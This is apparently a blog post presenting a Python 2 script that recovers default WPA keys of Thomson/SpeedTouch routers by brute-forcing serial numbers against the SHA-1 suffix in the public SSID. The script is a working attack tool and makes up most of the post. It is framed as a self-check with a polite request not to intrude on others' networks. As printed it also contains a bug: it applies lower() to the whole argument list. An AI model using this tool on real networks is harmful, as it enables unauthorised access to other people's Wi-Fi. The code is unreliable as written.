In case you didn’t know, the default WPA key in Thomson/SpeedTouch routers is generated from the router’s serial. By some strange coincidence, so is the router’s SSID, which means that if you know the SSID (which is public knowledge), you can brute-force the serial.
There are programs to do this already, but they were not future-proof or open enough to work now, so I wrote a small Python script to do it. Just enter the last part of the router’s SSID (e.g. 99AF3C in Thomson-99AF3C) and the script will find the likely WPA keys.
You can use this script to verify that your router is vulnerable and change the encryption key, but please don’t use it to break into other people’s networks! That’s rude.
EDIT: I updated the algorithm, it now features 200% more correctness and 400% more slowness :/ Sadly, it’s many times slower than similar tools, but maybe it will be useful to you somehow. Speedup tips appreciated!
Here it is:
#!/usr/bin/env python import sys import hashlib from binascii import hexlify as hexl from itertools import product as prod try: import psyco psyco.full() except: pass if len(sys.argv) != 2: print "speedtouchkey.py <SSID>" sys.exit(1) chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" ssid = sys.argv.lower().strip() try: int(ssid, 16) except ValueError: print "%s is not a valid SSID." % ssid sys.exit(1) for year in range(8,11): print "Searching year %02d..." % year for week in range(1, 53): for xxx in prod(chars, chars, chars): xx = "".join(xxx) serial = "CP%02d%02d%s" % (year, week, hexl(xx).upper()) sha = hashlib.sha1(serial).hexdigest() if sha.endswith(ssid): print " Likely key: %s (serial %s)." % (sha[:10], "CP%02d%02d??%s" % (year, week, xx))